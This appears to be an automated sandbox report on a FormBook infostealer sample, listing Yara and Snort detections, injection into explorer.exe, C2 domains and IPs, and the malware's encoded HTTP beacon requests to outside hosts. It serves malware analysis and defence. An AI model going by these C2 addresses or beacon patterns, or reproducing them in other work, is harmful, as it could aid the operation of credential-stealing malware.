Source: Yara match	File source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORY

Multi AV Scanner detection for domain / URL

Show sources

Source: serviciosgeneralesjba.online

Virustotal: Detection: 5%

Perma Link

Source: 3.2.56460021473877.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: 56460021473877.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 56460021473877.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: 56460021473877.exe, 00000003.00000002.763826486.0000000001610000.00000040.00000001.sdmp, control.exe, 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp
Source:	Binary string: control.pdb source: 56460021473877.exe, 00000003.00000002.764793089.0000000001A00000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: 56460021473877.exe, 00000003.00000002.763826486.0000000001610000.00000040.00000001.sdmp, control.exe
Source:	Binary string: control.pdbUGP source: 56460021473877.exe, 00000003.00000002.764793089.0000000001A00000.00000040.00020000.sdmp

Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 4x nop then pop ebx		3_2_00406ABB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop ebx		8_2_02836ABB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49811 -> 154.208.173.144:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49811 -> 154.208.173.144:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49811 -> 154.208.173.144:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49817 -> 67.205.83.103:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49817 -> 67.205.83.103:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49817 -> 67.205.83.103:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49851 -> 31.170.167.144:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49851 -> 31.170.167.144:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49851 -> 31.170.167.144:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49854 -> 44.227.65.245:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49854 -> 44.227.65.245:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49854 -> 44.227.65.245:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 52.5.157.71 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 216.10.241.4 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.eastsidescooters.com
Source: C:\Windows\explorer.exe	Network Connect: 67.205.83.103 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.celltecstore.com
Source: C:\Windows\explorer.exe	Domain query: www.thecrystalconsciousness.com
Source: C:\Windows\explorer.exe	Domain query: www.ps-sac.com
Source: C:\Windows\explorer.exe	Domain query: www.ville-fogalmam.com
Source: C:\Windows\explorer.exe	Domain query: www.box-770.com
Source: C:\Windows\explorer.exe	Domain query: www.txsports.club
Source: C:\Windows\explorer.exe	Domain query: www.rajinderbeas.com
Source: C:\Windows\explorer.exe	Network Connect: 31.170.167.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nhmingwei.com
Source: C:\Windows\explorer.exe	Network Connect: 154.208.173.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 148.72.177.185 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.nottryingdoing.com/ni8b/

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=bnsPHpJ0JXfYedDeyyRM0T59hyvcJozMf52DwVsUkht3MP5YfvQl77Z8cLzJCfxgsHVQ&kTY=TdZdU HTTP/1.1Host: www.nhmingwei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=Zvg5mbxlh1FEUeAb4a18wQGVMNqECI22VVMpQ/dBRbKZgYLiDL5+JoutiYtpnsrAj+vq&kTY=TdZdU HTTP/1.1Host: www.celltecstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=Eseu83Nj43qLBMj7MwWHNBqOzdwc7j/6ub3THp3k2Y03CkKraCnGH8IbXpARdpoCPKFf&kTY=TdZdU HTTP/1.1Host: www.ps-sac.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=lGGQ0sEZ2PLdmlcqvZgUhQs2XHM9QQiXiItD8ZWi5Y/Bd+WpsK3C+f5erJECmSl9JpeM&kTY=TdZdU HTTP/1.1Host: www.txsports.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=NtJPN2JufTPSUZxhVG2lwHAXNu/91wCxk6QRP91Jym6+DWJgifkFBuY1HfUXqRvRWjoF&kTY=TdZdU HTTP/1.1Host: www.rajinderbeas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=5gklYs16rcBoTPwexQgZaEg2WcCOIBmXVnGtPO+7DRUqV3YS52r/gKUkKnDwsfv+vOIy&kTY=TdZdU HTTP/1.1Host: www.box-770.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3StTy/F8q5n6jJiQm6&kTY=TdZdU HTTP/1.1Host: www.thecrystalconsciousness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 213.186.33.5 213.186.33.5

Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: control.exe, 00000008.00000002.941761338.0000000004CE2000.00000004.00020000.sdmp	String found in binary or memory: http://thecrystalconsciousness.com/ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3S
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 56460021473877.exe, 00000000.00000002.699621675.0000000006A60000.00000004.00020000.sdmp	String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 56460021473877.exe, 00000000.00000002.694670637.0000000000AF7000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.coma
Source: 56460021473877.exe, 00000000.00000002.694670637.0000000000AF7000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.comceomz
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: unknown

DNS traffic detected: queries for: www.nhmingwei.com

Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=bnsPHpJ0JXfYedDeyyRM0T59hyvcJozMf52DwVsUkht3MP5YfvQl77Z8cLzJCfxgsHVQ&kTY=TdZdU HTTP/1.1Host: www.nhmingwei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=Zvg5mbxlh1FEUeAb4a18wQGVMNqECI22VVMpQ/dBRbKZgYLiDL5+JoutiYtpnsrAj+vq&kTY=TdZdU HTTP/1.1Host: www.celltecstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=Eseu83Nj43qLBMj7MwWHNBqOzdwc7j/6ub3THp3k2Y03CkKraCnGH8IbXpARdpoCPKFf&kTY=TdZdU HTTP/1.1Host: www.ps-sac.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=lGGQ0sEZ2PLdmlcqvZgUhQs2XHM9QQiXiItD8ZWi5Y/Bd+WpsK3C+f5erJECmSl9JpeM&kTY=TdZdU HTTP/1.1Host: www.txsports.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=NtJPN2JufTPSUZxhVG2lwHAXNu/91wCxk6QRP91Jym6+DWJgifkFBuY1HfUXqRvRWjoF&kTY=TdZdU HTTP/1.1Host: www.rajinderbeas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=5gklYs16rcBoTPwexQgZaEg2WcCOIBmXVnGtPO+7DRUqV3YS52r/gKUkKnDwsfv+vOIy&kTY=TdZdU HTTP/1.1Host: www.box-770.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3StTy/F8q5n6jJiQm6&kTY=TdZdU HTTP/1.1Host: www.thecrystalconsciousness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: 56460021473877.exe, 00000000.00000002.693859689.00000000007F0000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: 56460021473877.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 0_2_000480A9	0_2_000480A9
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 0_2_007ECCCC	0_2_007ECCCC
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 0_2_007EF090	0_2_007EF090
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 0_2_007EF082	0_2_007EF082
